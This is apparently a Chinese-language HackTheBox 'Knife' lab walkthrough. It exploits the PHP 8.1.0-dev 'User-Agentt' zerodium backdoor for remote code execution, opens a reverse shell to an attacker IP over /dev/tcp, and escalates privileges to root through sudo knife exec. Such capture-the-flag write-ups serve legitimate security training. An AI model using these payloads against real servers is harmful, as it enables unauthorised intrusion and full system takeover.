当前位置: 首页 > news >正文

HackTheBox--Knife

news 2025/6/26 21:57:44
Knife 测试过程

1 信息收集

端口扫描

在这里插入图片描述

80端口测试

echo "10.129.63.56 knife.htb" | sudo tee -a /etc/hosts

网站是纯静态的,无任何交互功能,检查网页源代码也未发现任何可利用的文件。

在这里插入图片描述

检查页面请求时,请求与响应内容,在响应头中,发现 X-Powered-By 的参数为:PHP/8.1.0-dev

在这里插入图片描述

搜索 PHP/8.1.0-dev 相关信息可以发现,存在 'User-Agentt' Remote Code Execution 漏洞

在这里插入图片描述

‘User-Agentt’ Remote Code Execution 漏洞利用

点击查看漏洞利用地址

如果字符串以 zerodium 开头,可以在 User-Agent 标头中执行 PHP 代码。

User-Agentt: zerodiumsystem('id');

在这里插入图片描述

写入反弹 shell 命令

User-Agentt: zerodiumsystem("bash -c 'bash -i >& /dev/tcp/10.10.16.50/4444 0>&1'");

在这里插入图片描述

在这里插入图片描述

权限提升

在这里插入图片描述

knife 二进制文件,如果可以使用 sudo 权限运行,则可以直接提升权限

sudo knife exec -E 'exec "/bin/sh"'

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

http://www.lryc.cn/news/405887.html

相关文章:

  • Linux_实现TCP网络通信
  • 正则表达式与文本三剑客之grep
  • 微信小程序开发:项目程序代码构成
  • 【云原生】Kubernetes微服务Istio:介绍、原理、应用及实战案例
  • 【Docker】Docker-consul容器服务自动发现与注册
  • Go 1.22 remote error: tls: handshake failure
  • 迈向通用人工智能:AGI的到来与社会变革展望
  • 大模型额外篇章三:vercel搭建openai中转服务器
  • 使用 jQuery 中的 this 实例
  • 下载最新版Anaconda、安装、更换源、配置虚拟环境并在vscode中使用
  • 极狐GitLab Git LFS(大文件存储)如何管理?
  • 迭代学习笔记
  • 【安全】系统安全设计规范(DOC完整版)
  • windows常用命令整理
  • 视频处理基础知识1
  • Linux退不出vim编辑模式
  • TikTok养号的网络环境及相关代理IP知识
  • 过程调用和数组的分配访问
  • TeamViewer手机端APP提示:请先验证账户
  • 【SpringBoot】分页查询
  • 微软CrowdStrike驱动蓝屏以及内核签名
  • Spring中Bean的循环依赖
  • Java二十三种设计模式-代理模式模式(8/23)
  • Windows 11 家庭中文版 安装 VMWare 报 安装程序检测到主机启用了Hyper-V或Device
  • 机械学习—零基础学习日志(高数09——函数图形)
  • java迭代集合出现并发修改异常(ConcurrentModificationException)的原因以及解决方案
  • BGP选路之Local Preference
  • WEB渗透信息收集篇--IP和端口信息
  • 国内微短剧系统平台抖音微信付费小程序app开发源代码交付
  • Java语言程序设计基础篇_编程练习题**15.19 (游戏:手眼协调)